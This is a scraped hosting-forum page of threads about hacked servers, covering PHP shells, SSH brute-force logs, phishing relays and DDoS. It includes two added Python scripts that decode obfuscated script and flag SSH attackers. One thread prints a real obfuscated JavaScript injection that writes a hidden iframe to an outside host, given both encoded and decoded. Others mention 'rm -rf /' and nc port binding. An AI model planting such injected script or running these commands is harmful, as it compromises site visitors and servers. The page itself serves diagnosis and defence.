To Prevent Local Hack


I try to enhance my server security and prevent local hacks, but it seems useless.

I tried to chmod home/user/public_html to 711, disable functions, and enable PHP open_basedir.

I can stop some popular shells such as c99shell.php, but the server can be hacked locally.

Is there any way to prevent it completely?



Related Forum Messages:
How To Limit Sockets To Prevent Hack (logs Provided)
TCP 67.228.85.130:2848 212.158.153.66:4925 ESTABLISHED
TCP 67.228.85.130:2848 212.158.153.66:4926 ESTABLISHED
TCP 67.228.85.130:2848 212.158.153.66:4929 ESTABLISHED
TCP 67.228.85.130:2848 212.158.153.66:4930 ESTABLISHED

There are 5000's of 212.158.153.66 connecting to 67.228.85.130:2848.

How can I limit 212.158.153.66 to a max of about 30 connections to 67.228.85.130:2848?

View Replies!   View Related
How To Auto Detect A Hack Local File
My server is running CentOS 4 and cPanel.

Can anyone let me know how to auto-detect a hack local file? E.g. review cgi-telnet, c99shell ....

View Replies!   View Related
How To Prevent Spoofing From Postfix/local Part
I have a similar problem to the one explained at [url]

The detail of my problem is below:

Some people send spoofed mails, appearing to come from our mail users, to our users through Postfix/local; they are listed in maillog like below:

Apr 29 16:57:02 ns1 postfix/local[3075]: EC2153565E3: to=<user-mydomain.com@ns1.mydns.com>, orig_to=<user@mydomain.com>, relay=local, delay=486, status=sent (delivered to command: /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME)

But I do not know how to prevent these people from using my Postfix/local delivery part. How can I prevent this attack?

When I connect to my mail server to send or receive my mail, it looks like:
Apr 29 17:25:28 ns1 dovecot: pop3-login: Login: user=<user@mydomain.com>, method=PLAIN, rip=***.***.***.***, lip=***.***.***.***
....
Apr 29 17:25:55 ns1 dovecot: POP3(user@mydomain.com): Disconnected: Logged out top=0/0, retr=0/0, del=0/0, size=0....

But the attackers connect directly like below:

Apr 29 17:29:59 ns1 postfix/local[2456]: 3192E357FD9: to=<user-mydomain.com@ns1.mydns.com>, orig_to=<user@mydomain.com>, relay=local, delay=261, status=sent (delivered to command: /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME)
....
Apr 29 17:29:59 ns1 postfix/qmgr[2218]: 3192E357FD9: removed

How can the spammer connect to the Postfix/local part? My mail server is not an open relay. I tested it from the internet.

View Replies!   View Related
Hack
Recently I found that JavaScript code had been appended to my index.aspx file on the server!

Here is the code:

Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%

69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%34%39%61%30%36%30%34%33%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%

6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%31%30%38%34%29%2b%27%35%32%30%62%33%36%35%30%33%5c%27%20%77%69%64%74%68%3d%37%

36%20%68%65%69%67%68%74%3d%34%30%39%20%73%74%79%6c%65%3d%5c%27%64%
69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%

65%3e%27%29")); </script>
And this is the decoded one:

Code:
window.status='Done';document.write('<iframe name=749a06043a src='http://alltraff.ru/lol.php?'+Math.round(Math.random()*31084)+'520b36503' width=76 height=409 style='display: none'></iframe>')
I need to know 2 things:
1- Is it possible that my developer did something wrong and hackers can append anything to his code? Or is it a server issue and my host provider's servers were hacked?
2- Does anybody know anything about this piece of code? (I don't mean its action; I want to know: is it known?)

View Replies!   View Related
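
The decoding the poster did by hand can be done statically, without ever running the injected script. The following is an added example, not part of the original thread: it finds `unescape("...")` calls in a page, decodes them with JavaScript `unescape` semantics (including copies that were line-wrapped when pasted), and reports the hosts and hidden iframes in the result. The sample payload, the host `injected.example.invalid` and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

PCT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
UNESCAPE_CALL = re.compile(r"unescape\(\s*([\"'])(.*?)\1\s*\)", re.S)
URL = re.compile(r"https?://[^\s'\"\\<>]+", re.I)
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
WRAP = re.compile(r"\s*[\r\n]+\s*")  # line breaks introduced by copy/paste


def js_unescape(s):
    """Decode %XX and %uXXXX the way JavaScript's unescape() does.

    Each escape becomes one code unit (no UTF-8 interpretation), which is
    why urllib's unquote() is not used here.
    """
    return PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_layers(text, max_depth=5):
    """Return every decoded unescape() argument, following nested layers."""
    out, pending = [], [(text, 0)]
    while pending:
        cur, depth = pending.pop()
        if depth >= max_depth:
            continue
        for m in UNESCAPE_CALL.finditer(cur):
            decoded = js_unescape(WRAP.sub("", m.group(2)))
            out.append(decoded)
            pending.append((decoded, depth + 1))
    return out


def scan(html):
    """Summarise what each encoded script would have written into the page."""
    findings = []
    for decoded in decode_layers(html):
        hosts = {urlparse(u).hostname for u in URL.findall(decoded)}
        findings.append({
            "decoded": decoded,
            "hosts": sorted(h for h in hosts if h),
            "writes_markup": "document.write" in decoded,
            "hidden_iframe": bool(re.search(r"<iframe\b", decoded, re.I)
                                  and HIDDEN.search(decoded)),
        })
    return findings


def encode_sample(js):
    """Percent-encode every character, as the injected snippet does."""
    return "".join("%%%02x" % ord(c) for c in js)


# Constructed sample: same shape as the snippet in the post, placeholder host.
INNER = ("window.status='Done';document.write('<iframe name=x "
         "src=\\'http://injected.example.invalid/lol.php?\\'"
         "+Math.round(Math.random()*100)+\\'abc\\' width=76 height=409 "
         "style=\\'display: none\\'></iframe>')")
ENC = encode_sample(INNER)
SAMPLE_HTML = ("<html><body>normal page</body></html>\n"
               '<script>eval(unescape("' + ENC[:60] + "\n\n" + ENC[60:]
               + '")); </script>')

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML):
        print("hosts:", f["hosts"], "| hidden iframe:", f["hidden_iframe"])
        print("decoded:", f["decoded"])
```

Run against a copy of each served file (not only `index.*`), any finding with `hidden_iframe` set marks a file to restore from a known-good copy.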
Are They Going To Hack Me
When I check statistics for my site, I got this link: [url]

When I click on this site, it runs very strangely. Are they going to hack me, or what do they want to do with my site by using the scripts on their site?

after checking this: [url]

View Replies!   View Related
Possible Hack
I have searched and searched but can't find anything related here, on Cpanel.net or through google.

I have a Linux/Cpanel machine. Hosts about 15-20 websites. No matter which site you try to visit it is redirected to some malware site or something that tries to get you download a program (Clearly a virus or trojan).

I cannot find any info on this or how to even stop the redirects.

View Replies!   View Related
Someone From The Planet Trying To Hack In
My firewalls block IP's from multiple failed login attempts. The FW on one server has been blocking someone from The Planet. My servers are at GNAX, so why is someone from TP trying to get in?

This is what the system emails tell me:

IP: 70.87.XX.X (2.27.XXXX.static.theplanet.com)
Failures: 5 (sshd)
Interval: 95 seconds
Blocked: Yes

View Replies!   View Related
Hack Attempt
I have started seeing the following error in the Event Viewer every day:

"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."

The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?

View Replies!   View Related
How Do I Un-hack My Site
I haven't really delved into it yet, but my wife and I have a personal website with pictures and what-not which was hacked by some Saudi Arabian hacker.

site is www.nickandkathi.com

I don't have the index files with me, but is all I need to do just re-load my index page on my PC to my file? I'm hosted with hostgator.

How do I stop this from happening again?

View Replies!   View Related
Someone Try To Hack My Password
May 28 16:23:06 server sshd(pam_unix)[13017]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root

I got so many of these lines in my server log.

First of all, where is the server log located anyway? I got this from SIM.

May 28 16:23:09 server sshd(pam_unix)[13037]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root
May 28 16:23:11 server sshd(pam_unix)[13045]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root
May 28 16:23:11 server sshd(pam_unix)[13061]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root
May 28 16:23:13 server sshd(pam_unix)[13066]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root
May 28 16:23:13 server sshd(pam_unix)[13067]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root
May 28 16:23:13 server sshd(pam_unix)[13071]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root
May 28 17:00:02 server ntpdate[19626]: adjust time server 192.5.41.40 offset 0.343837 sec
May 28 18:00:07 server ntpdate[28711]: adjust time server 192.5.41.40 offset 0.344493 sec
May 28 19:00:06 server ntpdate[3218]: adjust time server 192.5.41.40 offset 0.342326 sec
May 28 20:00:02 server ntpdate[8283]: adjust time server 192.5.41.40 offset 0.341603 sec
May 28 21:00:07 server ntpdate[13899]: adjust time server 192.5.41.40 offset 0.343715 sec
May 28 21:37:45 server sshd(pam_unix)[17268]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root
May 28 21:37:45 server sshd(pam_unix)[17271]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root
May 28 21:37:45 server sshd(pam_unix)[17270]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root
May 28 21:37:45 server sshd(pam_unix)[17254]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root

View Replies!   View Related
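
Log lines in the `sshd(pam_unix)` format shown above can be summarised per source address to see which hosts are guessing passwords and how fast. The following is an added example, not part of the original thread: it parses that format even when several entries were pasted onto one line, ignores unrelated entries such as `ntpdate`, and flags sources whose failures within a time window reach a threshold. The sample log uses constructed documentation addresses; the function names, the default threshold of 5 failures in 95 seconds and the `year` argument (syslog timestamps carry no year) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), start=1)}

# Matches one entry wherever it starts, so run-together pastes still parse.
ENTRY = re.compile(
    r"(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<hms>\d{2}:\d{2}:\d{2}) \S+ "
    r"sshd\(pam_unix\)\[\d+\]: authentication failure;"
    r"[^\n]*?rhost=(?P<rhost>\S+)(?: +user=(?P<user>\S+))?")


def parse_failures(text, year):
    """Return sorted (timestamp, rhost, user) tuples for sshd PAM failures."""
    events = []
    for m in ENTRY.finditer(text):
        if m["mon"] not in MONTHS:
            continue
        h, mi, s = map(int, m["hms"].split(":"))
        ts = datetime(year, MONTHS[m["mon"]], int(m["day"]), h, mi, s)
        events.append((ts, m["rhost"], m["user"] or "(unknown)"))
    return sorted(events)


def peak_failures(events, window_seconds):
    """Largest number of failures per rhost inside any sliding window."""
    by_host = defaultdict(list)
    for ts, rhost, _user in events:
        by_host[rhost].append(ts)  # already in time order
    window = timedelta(seconds=window_seconds)
    peaks = {}
    for rhost, times in by_host.items():
        start = best = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        peaks[rhost] = best
    return peaks


def flag_sources(text, year, threshold=5, window_seconds=95):
    """Sources whose peak failure count reaches the threshold."""
    peaks = peak_failures(parse_failures(text, year), window_seconds)
    return {host: n for host, n in peaks.items() if n >= threshold}


def sample_line(hms, pid, rhost):
    return (f"May 28 {hms} server sshd(pam_unix)[{pid}]: authentication "
            f"failure; logname= uid=0 euid=0 tty=ssh ruser= rhost={rhost} "
            "user=root")


# Constructed sample, deliberately joined onto a single line.
SAMPLE_LOG = " ".join(
    [sample_line(f"16:23:{s:02d}", 13000 + s, "192.0.2.10")
     for s in (6, 9, 11, 11, 13, 13)]
    + ["May 28 17:00:02 server ntpdate[19626]: adjust time server "
       "192.0.2.123 offset 0.343837 sec"]
    + [sample_line("21:37:45", 17250 + i, "198.51.100.24") for i in range(4)])

if __name__ == "__main__":
    events = parse_failures(SAMPLE_LOG, 2024)
    print("failures parsed:", len(events))
    print("peak per source:", peak_failures(events, 95))
    print("flagged:", flag_sources(SAMPLE_LOG, 2024))
```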
Client Threatening To Hack
I just had a client whose hosting account was automatically suspended due to him not paying the hosting bill. He opened up a ticket and asked why his site is suspended. I informed him that he didn't pay the bill and the system suspended it automatically. I told him that the system generated e-mails as well and he said he didn't get them, while when I looked in WHMCS, it said it DID get sent to him. The client said his website was DDoS'd because it used 3 GB of BW in one month and I told him there was no DDoS attack. For the kind of site he had (100+ users online at one time, vBulletin forum), it was common to use that much.

The client is now saying that he is going to attempt to hack the servers to see if they are DDoS protected or not. Of course, my servers are protected (WiredTree), so should I be worried?

His quote:

Quote:

I'LL TEST TO SEE IF YOU HAVE DDOS PROTECTION...TIME TO GATHER MY HACKING BUDDYS.

Also, I have notified WiredTree about this just right now.

View Replies!   View Related
Possible Root Level Hack
I believe my server has been hacked, as I ran top and observed the following:

top - 15:53:39 up 12 days, 3:16, 2 users, load average: 7.87, 10.30, 11.10
Tasks: 789 total, 3 running, 771 sleeping, 0 stopped, 15 zombie
Cpu(s): 20.4% us, 9.3% sy, 4.8% ni, 35.0% id, 30.1% wa, 0.4% hi, 0.0% si
Mem: 2074364k total, 2048296k used, 26068k free, 72136k buffers
Swap: 2040244k total, 2076k used, 2038168k free, 1286884k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
22488 root 27 12 3376 1352 508 R 16.8 0.1 12:08.63 rsync
15370 named 20 0 84020 30m 1936 S 4.2 1.5 20:15.72 named
16732 root 16 0 4684 1456 868 S 2.9 0.1 0:01.07 ftp
22489 root 27 12 5444 1860 1420 R 2.9 0.1 3:27.51 ssh
26448 mailnull 17 0 9016 4088 2832 D 2.9 0.2 0:00.11 exim
26436 mailnull 16 0 0 0 0 Z 2.4 0.0 0:00.09 exim <defunct>
477 root 15 0 0 0 0 D 2.1 0.0 217:34.28 kjournald
26408 mailnull 16 0 8964 4584 3244 D 2.1 0.2 0:00.08 exim
26442 mailnull 16 0 0 0 0 Z 2.1 0.0 0:00.08 exim <defunct>
16975 root 15 0 4684 1444 856 S 1.6 0.1 0:00.56 ftp
23071 root 16 0 3760 1420 764 R 1.6 0.1 0:05.08 top
26477 root 16 0 8616 3892 2656 D 1.6 0.2 0:00.06 exim
26486 root 15 0 9420 3888 2656 D 1.3 0.2 0:00.05 exim
16694 root 15 0 4684 1436 848 S 1.0 0.1 0:00.63 ftp
16840 root 15 0 4684 1448 860 S 1.0 0.1 0:00.43 ftp
16865 root 15 0 4684 1444 856 S 1.0 0.1 0:00.72 ftp
16932 root 15 0 4684 1444 856 S 1.0 0.1 0:00.42 ftp
17275 root 15 0 4684 1448 860 S 1.0 0.1 0:00.57 ftp
26434 mailnull 16 0 8972 3956 2704 D 1.0 0.2 0:00.04 exim
26437 mailnull 15 0 8964 3920 2688 D 1.0 0.2 0:00.04 exim
26451 mailnull 15 0 8968 3932 2696 S 1.0 0.2 0:00.04 exim
26489 root 18 0 10568 3912 2656 S 1.0 0.2 0:00.04 exim
5310 root 15 0 40104 35m 1888 S 0.8 1.8 10:55.77 tailwatchd
16771 root 15 0 4684 1448 860 S 0.8 0.1 0:00.44 ftp
16779 root 15 0 4684 1448 860 S 0.8 0.1 0:00.56 ftp
16806 root 16 0 4684 1444 856 S 0.8 0.1 0:00.71 ftp
16844 root 15 0 4684 1440 852 S 0.8 0.1 0:00.57 ftp
16854 root 15 0 4684 1444 856 S 0.8 0.1 0:00.72 ftp
16857 root 15 0 4684 1444 856 S 0.8 0.1 0:00.63 ftp
16868 root 15 0 4684 1448 860 S 0.8 0.1 0:00.79 ftp
16885 root 15 0 4684 1448 860 S 0.8 0.1 0:00.68 ftp
16982 root 15 0 4684 1440 852 S 0.8 0.1 0:00.40 ftp
17008 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp
17038 root 15 0 4684 1448 860 S 0.8 0.1 0:01.01 ftp
17082 root 15 0 4684 1448 860 S 0.8 0.1 0:00.71 ftp
17106 root 15 0 4684 1444 856 S 0.8 0.1 0:00.84 ftp
17288 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp

Now, I am logged in as root in two terminals and it shows:

root pts/2 Apr 28 15:19 (x.x.x.x)
root pts/3 Apr 28 14:06 (x.x.x.x)

I am just wondering how root can perform ftp tasks when my root login is sitting idle, and what about pts/0 and pts/1?

I stopped the ftp service in cPanel and it was started again automatically.

View Replies!   View Related
What's Your Take On This Email Hack Scenario
I'm not a server admin, but help my client with basic IT tasks... we built their website for them and just sort of fell into helping them out when they need it. My client has a VPS with knownhost; the VPS is only used for hosting the email for their domain, and the website is hosted on another server. 4 days ago, I logged in and checked the mail queue and found thousands of emails in the queue that were phishing emails trying to get passwords from the recipients for a service called moneybookers.com. According to knownhost, the hacker had guessed the password of one of the email accounts and had started sending mail through it. The hacked account was deleted that day as it was a test account and was not needed anyways. As soon as the account was deleted, the phishing mails stopped being sent. Knownhost reassured us the server hadn't been breached, but we changed the root password anyways. Around 15k to 20k emails were sent in a 14 hour period. Since that time we have appeared on a few blacklists and have a negative senderbase score, and so any company that uses senderbase is obviously rejecting our mail... My client has just hired assuretymail services to get accredited and has invested a lot of money into streamlining mail delivery, so this is obviously devastating to them.

Today I logged in and again found 1000's of email in queue, yet again, and this time they were paypal phishing emails. I immediately changed the passwords of all 50 of the email accounts, including the root. It looks like around 14k or so emails were sent.

Trying to understand how this could happen yet again, knownhost is saying that, yet again the account "test", the same account used last time was used for sending out emails. I was confused by how a previously deleted account could be used to again begin sending emails even though it was deleted 4 days ago. According to knownhost "The only reasonable explanation for this activity would be that exim cached credentials for system user "test" and didn't refresh its internal cache since the moment when "test" account was removed. To force exim to refresh the cache exim mail server was restarted on your system, so it shouldn't be possible to use that (non-existent) account again to relay the mail through your system."

Being that I'm not a server admin and I rely on knownhost for server admin basics, am I out of line thinking that knownhost dropped the ball here? I mean is it obvious that a restart was in order after the first hack or is this just a bad chance scenario. Is the scenario they are describing plausible?

View Replies!   View Related
Physical Hack Of My Server
Physical hack of my server?

My server (CentOS 4, Plesk 8) was frozen for a day and the NOC had to reboot it; here is the mail I got from my host:

>Your server was frozen, with a kernel panic. Ensure that you check your logs closely to determine how this happened,

After looking at the message log here is the part of the log when the crash happened:
Is this really a kernel panic, I am not sure...

Dec 8 09:05:36 server kernel: input: AT Translated Set 2 keyboard on isa0060/serio0
Dec 8 09:05:37 server hal.hotplug[2701]: DEVPATH is not set
Dec 8 09:05:37 server hal.hotplug[2702]: DEVPATH is not set
Dec 8 09:05:42 server login(pam_unix)[2670]: bad username [ ]
Dec 8 09:05:42 server login[2670]: Authentication started for user
Dec 8 09:05:44 server login[2670]: FAILED LOGIN 1 FROM (null) FOR , Authentication failure
Dec 8 09:05:50 server login(pam_unix)[2670]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty1 ruser= rhost= user=root
Dec 8 09:05:50 server login[2670]: Authentication started for user root
Dec 8 09:05:53 server login[2670]: FAILED LOGIN 2 FROM (null) FOR root, Authentication failure
Dec 8 09:05:57 server login(pam_unix)[2671]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty2 ruser= rhost= user=root
Dec 8 09:05:57 server login[2671]: Authentication started for user root
Dec 8 09:05:59 server login[2671]: FAILED LOGIN 1 FROM (null) FOR root, Authentication failure
Dec 8 09:06:00 server shutdown: shutting down for system reboot
Dec 8 09:06:00 server init: Switching to runlevel: 6
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
Dec 9 05:52:36 server syslogd 1.4.1: restart.

It looks to me as if someone has physically connected a keyboard and logged in at the NOC.

I use iptables to restrict SSH access to my IP each time I connect remotely, so I don't think a remote connection has been possible.

Any idea about this line:
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
I think it's just corrupted data that was written when the server shut down.

Also, I didn't find any other signs of kernel panic in the logs.

Looking at the httpd error log I found these lines before the crash:

[Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind
[Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind

Apparently someone was doing a server scan. Maybe the 2 events are correlated and the server freeze could have been a result of some buffer overflow attack, but should I be finding some evidence of this in the Apache logs?

What direction should I take to investigate a bit further on this server freeze?

View Replies!   View Related
Figuring This Hack Attack Out
My company website URL is something along these lines: (I won't give the full URL because I guess that would be classed as advertising.)

www dot olapXXXXXX dot com

Now, we've discovered today that there are links on the site that look like this:

www dot olapXXXXXXdotcom/pornsex.dhtml

These links and pages have not been created by us. The link goes to a page advertising various porn, poker, viagra sites etc.

I've checked the FTP and the pages do not seem to be on the server.

So I'm a little bemused and stuck! How did someone piggyback on our site in this way?

The pages are indexed in Google so if you do a search for our company name and 'strip poker' then the link shows up in Google.

Does anyone have any idea what's going on? We own the URL, we don't believe our password has been compromised, the domain has not expired.

I think perhaps it's something to do with DHTML? We don't use it but all the bad pages do.

The links are not accessible from any of our pages (as far as I can see) but it's still a problem because they show up in Google.

View Replies!   View Related
Notifying DC Of Hack Attempt
Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?

Is this stuff largely ignored?

Is anyone else doing this?

Is there an easier way?

View Replies!   View Related
Hack Attempt? I'm Pretty Sure...
A new client has just opened up an account and the first thing he's installed is a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them they're root kits of some sort. Am I correct in thinking this?

The account has been suspended for the time being.

View Replies!   View Related
Secure VPS After Many Hack Attacks
My VPS provider just rebuilt my VPS after many hack attacks.

For some days I have been getting emails from the firewall that someone logged in to my VPS/MySQL using SSH.

I don't know what they do, but they don't disturb any account. Only some downtime is felt during this. But last night my VPS stopped working, so my provider rebuilt the VPS.

How can I secure my VPS now? I have cPanel installed.

View Replies!   View Related
How To Best Secure WP From Any Attacks, Hack Attempts Etc?
How to best secure WP from any attacks, hack attempts and others?

View Replies!   View Related
CPU Quota Hack Program
A hack program (I do not know what its name is) causes the following error via vBulletin or any forum:

Code:
This Account Has Exceeded Its CPU Quota
I do not know how I can find out the accessing IP and block the access request

and

I do not know its running system?

I'm on a shared host (have an SSH account).

View Replies!   View Related
Hack Erases 100,000 Websites
Don't know if anyone else saw this.

[url]

Once again points out the importance of backups.

View Replies!   View Related
Lfd Warning: Hack Attempt Or Legit
Code:

Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser] - Suspicious directory
The 'someuser' is a legitimate user on the server, an auto body website setup last October.

The content of the directory:

Quote:

root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm

File content:

Code:
$CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan";
$CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build";
$CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile";
$CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources";
1;
__END__

Code:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions

View Replies!   View Related
Index.php Not Working After Hack Attempt
I had an untapped image upload site on my server which I forgot. Some guys or children uploaded something noxious and neutralized all the "index.php" files. This was a hack attempt with SSH.

We noticed that, closed this account and deleted the uploaded files. But there is a quirky problem: none of the index.php files work after this attempt. An index file works after changing its name, for example to "mindex.php".

We updated all the services and rebuilt Apache, but it's still not working. We can't use any index.php on the server.

Additionally, 34 possible trojans appear on the server. I tried to delete them with BitDefender but couldn't do that. (I checked that with WHM / Scan for Trojan Horses.)

View Replies!   View Related
Captured Hack Attempt - PHPCoin URL Hole
Just an FYI - we have been monitoring some attempts from europe. Here is a file that they were trying to include using a hole in PHPCoin's URL handler:

[URL removed] stringa.txt

The attempt was coming from linux.htd-information.dk

View Replies!   View Related
How To Prevent Rm -rf /
Does anyone know any way that "rm -rf /" can be disabled? Or any SELinux rule or something to prevent this?

Or if I wanted to prevent a certain directory from being deleted, like backups, but something unlike chattr that someone can figure out quickly.

I'm sure LOTS of people would like to know about this. I've searched around and the only somewhat useful thing I have found is an rm wrapper that sends everything to a trash file in the root of the mount point.

View Replies!   View Related
Prevent Phishing
I'm not that techy. I'd like to ask why this person downloaded the file below before uploading some phishing webpages to my account? I've changed my password numerous times from different computers and even from a mobile phone just to check if the person can still get in. But again it is no use; the person was able to upload phishing pages.

logs:

May 25 21:50:42 server100 pure-ftpd: (weblogin100@62.56.133.36) [NOTICE] /home/weblogin100//.htpasswds/update/Login.php downloaded (21251 bytes, 755.78KB/sec)

Right now I have deleted all other scripts on the account and only some HTML files remain. Folders were also set to 644, not 777. While waiting to see if the person can still upload his phishing pages, please help me understand why he downloaded the file above. I've checked the files on my account and I cannot see Login.php. By the way, I have a root login and only two accounts were constant phishing victims.

View Replies!   View Related
How Prevent Hackers Away
I am giving a few tips on securing your server against hack attempts. You must check these in spite of other security measures like firewalls, rootkit detectors etc.

1. Most important, do not disable safe_mode under php.ini. If any customer asks to disable it, turn it off on his account only, not on the whole server.

As most of the time the attack is done using a shellc99 (phpshell) script. In case safe_mode is off on the server and there are public dirs with 777 permission, he can easily hack through.

2. Compile Apache with safe mode as well.

3. In cPanel under Tweak Settings, turn on base_dir; if someone requests to turn it off, turn it off on his/her account only, as using phpshell one can easily move to main server dirs like /etc, /home.

4. Do not allow anonymous FTP on your server. You can turn it off from the ftp config under WHM Service Configuration. If it's allowed, one can easily bind a port using the nc tool with your server and gain root access. Always keep it disabled.

5. Make sure /tmp is secured. You can easily do that by running this command /scripts/securetmp using ssh. But do make sure /tmp is secured. Else one can upload some kind of perl script in the /tmp dir and can deface or damage all data on a few/all accounts on your server.

keeping your server secure from hack attempts.

View Replies!   View Related
Prevent Ddos
For 2 days now my server has been under DDoS; I stay at my computer and block IPs but it does not end. Is there a program to block IPs automatically?

View Replies!   View Related
Prevent Mass Download
I need anything to prevent mass downloads.

My server costs a huge amount of bandwidth monthly, because of mass downloading?

View Replies!   View Related
Prevent From Iframe Virus
I need some ideas on how to prevent iframe virus injection into the server. Also, is there any mod which helps protect against the iframe virus?

View Replies!   View Related
How To Prevent Nobody To Move In Server
I have my own box for my forum. Now I share my box with friends, but in reality they are freak friends. Just to be safe, I am looking to know what functions I can disable in php.ini, or any program/tool, to prevent anybody / an attacker with *nobody* permission from moving around in the server via his shell script.

As we know, some attackers use their own php-shell to hack sites on *shared hosting*, so they can move to any account after they know the user account name (*/etc/passwd*). So, as I said before, are there any good functions I can disable to prevent these attackers from moving around in the server? Or can I install any good tool (*other than modsecurity*) in the system to prevent *nobody* from doing that?

View Replies!   View Related
Mod_security To Prevent Some Script
I try to use mod_security to prevent some script in some files.

Imagine I want to block all scripts that include "test" in the body.

So if the code of script.php is:

HTML Code:
<html>
<p>test</p>
</html>

